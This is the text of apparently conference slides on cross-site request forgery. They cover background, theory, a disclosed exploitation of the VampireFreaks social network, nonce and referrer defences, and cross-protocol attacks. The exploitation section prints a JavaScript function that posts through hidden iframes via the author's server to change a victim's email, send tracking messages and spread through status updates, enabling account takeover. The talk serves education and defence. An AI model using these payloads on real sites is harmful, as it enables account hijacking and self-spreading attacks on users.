Surf’s Up!Surf’s Up! Daniel McCarney (@binaryparadox) The Next HOPE Exploring Cross Site Request Forgery through social network exploitation

Surf’s Up!

Daniel McCarney (@binaryparadox)The Next HOPE

Exploring Cross Site Request Forgery through social network exploitation.

http://binaryparadox.net [email protected]

Surf's Up!

1. CSRF Background

2. Theory

3. VampireFreaks Exploitation

4. CSRF Protection

5. Interesting Benefits & CSRF Variation


CSRF?● CSRF → “Sea Surf” → Cross Site Request Forgery

● Self-explanatory name:

– Forcing requests to a site from another

● Open Web Application1 Security Project Top 10

– #5 in 20072

– #5 in 20103

– 3 years and no improvement?● “Prevalence: widespread”3

● “Detectability: easy”3


Widespread● First BugTraq Posting. CSRF term coined (2001)

– “Cross-Site Request Forgeries (Re: The Dangers of Allowing Users to Post Images)”4

● Ed Felten, Bill Zeller (2008)

– "Cross-Site Request Forgeries: Exploitation and Prevention"5

– ING Direct, Youtube, MetaFilter, NY Times

● “Sleeping Giant”6

● Very little developer knowledge!


We <3 CSRF● Easy!

– Web apps are often custom code i.e. likely vulnerable

– Moving back to thin clients & hosted services

● Very different from XSS. Less understood

– XSS and CSRF are complementary

– XSS helps us bypass CSRF protections

● Powerful implications

– If the user can do it, you can force them to do it


Surf's Up!

1. CSRF Background

2. Theory


4. CSRF Protection



Storytime● Imagine a made-up website, community.com

– Has various “members-only” sections

– Written in PHP, beginner to novice developer

● Members are able to post content to different topic threads

– Links, images, styled & formatted text

– Potentially BBCode/Limited Markup?

● Authentication done by Cookie & PHP Session

– HTTP Cookie with a session ID set by login code

● Needs a way to log members out by request

– http://community.com/app/logout.php


Storytime● Logout script receives a GET from an authenticated member

– Expires cookie, ends session, cleans-up

● Is there a problem?

● A tale of two users: Alice & Mallory

● Mallory posts a crafted image tag to part of a members only community.

– <img src=”http://community.com/app/logout.php” />

– [img]http://community.com/app/logout.php[/img]


Trouble at Sea

● Alice logs in to community.com

– Session ID stored in a cookie for community.com● Alice browses to Mallory's crafted post

● Image tag is processed by Alice's browser

● GET request sent to http://community.com/app/logout.php to acquire image data

– Cookie is sent along for the ride!

– Why not? It's set for community.com

● Logout script dutifully gives Alice the boot!

http://community.com/app/logout.php


Picture >= 1000 Words








(Mis)understanding

● A purposefully toy example

● Bad “form” (har har) to logout with a GET request

– GET should be “Idempotent”7 → No side effects

● Potentially misleading – CSRF does not rely on:

– The ability to post content to a target site,

– Image tags or a specific markup language

– A GET based form


(Mis)understanding● No requirement for content creation rights

– No need for tags/content to be placed on community.com

– Remember the “cross site” aspect?

● Not particular to Image tags

– Lots of tags invoke GET requests automatically

● Further, not limited to GET method forms

– Either social engineer a form POST

– Or use javascript to submit one automatically


More Complex Flow


More Complex Flow


More Complex Flow


More Complex Flow


Surf's Up!

1. CSRF Background

2. Theory


4. CSRF Protection



VampireFreaks● What is it? → “Gothbook”?● ~1,228,795 members● ~3,000 members online at any given time

● Appeal of social networks:– Easy to embed content → images, CSS, html

– Easy to socially engineer users

– Easy to spread → designed for sharing!


Disc-lame-er

● Vulnerability (mostly) already patched– Disclosed responsibly

– Never released in the wild

– Wonderful treatment from admins

● Your actions are your own, not mine● Yadda, yadda, yadda


Attack Flow

● Attack components:– Exploit - located on my server, POST-based

– A tracking account – hit tracking via PM

– Status updates – provide “viral” component

– Social Engineering – luring logged in users to exploit


Social Engineering

● POST-based exploit means off-site visit required

● Need to lure logged-in users to exploit– Enticing links in Forum Posts/Personal Messages

● Need to hide the true nature of the exploit– BASE64 encoded URL parameter for “decoy”

content

– Main page iframes the content of benign url param


VF DOMination● Exploit Code:

– Crafted POST requests submitting to VF

– Contained in iframes to conceal responses

– Submitted automatically via javascript

● 3 POSTs:

1) Changes registered e-mail address

2) Sends tracking PM

3) Updates the user's status


E-mail Switch-a-roo

<form action="" method="post"> <input type="hidden" value="" name="x"> New Email: <input value="" name="new_email" maxlength="100" size="50"> <br><br> <input type="submit" value=" click here to send my validation email to my new email address "></form>


Tracking PM

<form name="comment_form" onsubmit="submitonce(this)" action="" method="post"> <input type="hidden" value="paradox" name="user"> <input type="hidden" value="124670" name="uid"> <input type="hidden" value="0" name="comment_id"> <input type="hidden" value="0" name="i"> <textarea wrap="soft" rows="13" cols="60" name="comment" id="comment_textarea"></textarea>

... <input type="checkbox" value="1" name="private"> Send To Inbox <input type="checkbox" value="1" id="preview" name="preview">Preview <input type="checkbox" checked="" value="1" name="include_sig">Include Signature ... <input type="submit" onclick="sendUserMessage(this.form, 'paradox'); return false;" value=" submit comment "></form>


Status Updates

<form method="post" action="/profiles/update_status.php" name="status_form"> <span id="current_status"> <input type="submit" onclick="updateStatus(); return false;" id="spopupgo" value="Go" name="submitstatus"> <textarea onclick="getFocusChangeInput('update status...', this.id);" onblur="loseFocusChangeInput('update status...', this.id);" name="status_input" id="spopuptextarea">update status...</textarea> </span></form>


Code Sample<script type='text/javascript' language='JavaScript'>function crossDomainPost(writer_url, post_target_url, params){ var url_params = ''; for (var key in params){ url_params =url_params + '&' + key + '='+encodeURIComponent(params[key]); } var url = writer_url + '?post_target_url=' + encodeURIComponent(post_target_url) + url_params; var iframe = document.createElement('iframe'); iframe.setAttribute('src', url); iframe.setAttribute('width', 1); iframe.setAttribute('height', 1); iframe.setAttribute('style', 'border: none;'); var p = document.getElementsByTagName('html'); p[0].appendChild(iframe);}</script>


Code Sample…

news_link = document.location;crossDomainPost( 'http://binaryparadox.net/vf/form_writer.php', 'http://vampirefreaks.com/serv/ajaxController.php', { action: 'updateStatus', home: '0', status: news_link });</script><?php $target = $_GET['id']; $target = base64_decode($target);?><iframe src="<?php echo $target; ?>" width='100%' height='100%' style="border: none"/>


Nothing to see here, move along


Wheels within wheels


The plot thickens...● With the account e-mail changed, you could

gain the account password– “Forgot my password” feature

– Original account password sent -clear text-

● Victims tracked by the IM sent

● Propagation achieved through status updates pointing back to the exploit page


BAD BAD BAD BAD!


Surf's Up!

1. CSRF Background

2. Theory


4. CSRF Protection



Halp! – Protection against CSRF

● Referrer checking– All actions on site pass along the page referrer

– App checks referrer that sourced the submit● vampirefreaks.com vs binaryparadox.net

● Effective?– Possibly not foolproof...

– Plugin vulnerabilities (maybe?)

– XSS-paired CSRF? → issues regardless...


Halp! – Protection against CSRF● Nonce → a difficult to predict key/secret● Should be generated per-request!

– Server writes nonce in hidden param for each form

– Also stores nonce in user's server side session

● Future requests must have the correct nonce● Need XSS to access nonce as attacker

8


VF E-mail Change 2.0

<form action="" method="post"> <input type="hidden" value="4a39014473ccf63bffdd8d96296b85b8d84f0ef4" name="validate"> <input type="hidden" value="" name="x"> New Email: <input value="" name="new_email" maxlength="100" size="50"> <br><br> <input type="submit" value=" click here to send my validation email to my new email address "></form>


Surf's Up!

1. CSRF Background

2. Theory


4. CSRF Protection



What else?

● Cross Protocol Attacks– Largely the same as CSRF

– Payload form data aimed at a non-HTTP service

● Jochen Topf – 2001– “HTML Form Protocol Attack” 9

– Tricking browsers into sending arbitrary data to specified port

– FTP, SMTP, NNTP, POP3, IMAP, & IRC

– Led to browsers blocking some ports by default10


For the Lulz● Blacklists are never perfect!

– Ask Goatse Security!

● Firefox XPS IRC Attack11

– Default IRC port not on blocked list

– Reflected IRC spam in the quest for lulz

● Safari XPS Attack12

– Unsigned short overflow in port #

– “Add 65536 to 25 to make 65561”12

– 65561 != 25. Troll on.


On Obscuring Origin● Think of exploit flow

– User requests bad content

– Bad content forces user to perform an action

● Often difficult to link bad content to action● Attack source is the User● What the User can access, the exploit can


On Obscuring Origin

● Behind the Wall– Attacks can access Intranet resources

– Networking equipment

– Test servers

– Private systems

● SOHO Routers– Reflash firmware13

– Set DNS Server(s)14


On Obscuring Origin


On Obscuring Origin


On Obscuring Origin


On Obscuring Origin


Clickjacking● An evolution of CSRF?● Still forcing authenticated client actions● Bypasses nonce protection: whole page loaded

invisibly● Uses the real forms instead of a cross-site

request (nonce intact)● Hijacks user input to manipulate invis. page


</presentation>● Hat tip to Ebova, Mreh, Clutch, Temujin, ZanZ● http://friendsofbyron.alteeve.com/


Resources1 – OWASP – http://owasp.org2 OWASP top 10 2007 http://www.owasp.org/index.php/Top_10_20073 OWASP top 10 2010 http://www.owasp.org/index.php/Top_10_20104 CrossSite Request Forgeries (Re: The Dangers of Allowing Users to Post Images) http://www.tux.org/~peterw/csrf.txt5 "CrossSite Request Forgeries: Exploitation and Prevention" http://from.bz/public/documents/publications/csrf.pdf6 "Sleeping Giant" http://jeremiahgrossman.blogspot.com/2006/09/csrfsleepinggiant.html7 – HTTP Spec http://www.w3.org/Protocols/rfc2616/rfc2616sec9.html8 – Jack Mannino http://twitter.com/jack_mannino

http://jeremiahgrossman.blogspot.com/2006/09/csrf-sleeping-giant.html


Resources9 "HTML Form Protocol Attack" http://www.remote.org/jochen/sec/hfpa/hfpa.pdf 10 Mozilla Port Blacklisting http://www.mozilla.org/projects/netlib/PortBanning.html11 Firefox XPS Attack (NSFW) http://encyclopediadramatica.com/Firefox_XPS_IRC_Attack12 Safari XPS Attack (NSFW) http://encyclopediadramatica.com/Safari_XPS_Attack13 – CSRF File Upload http://www.gnucitizen.org/blog/crosssitefileuploadattacks/14 – CSRF BT Router Research http://www.gnucitizen.org/blog/bthomeflubpwninthebthomehub/

http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/

Documents

Surf’s Up!Surf’s Up! Daniel McCarney (@binaryparadox) The Next HOPE Exploring Cross Site Request Forgery through social network exploitation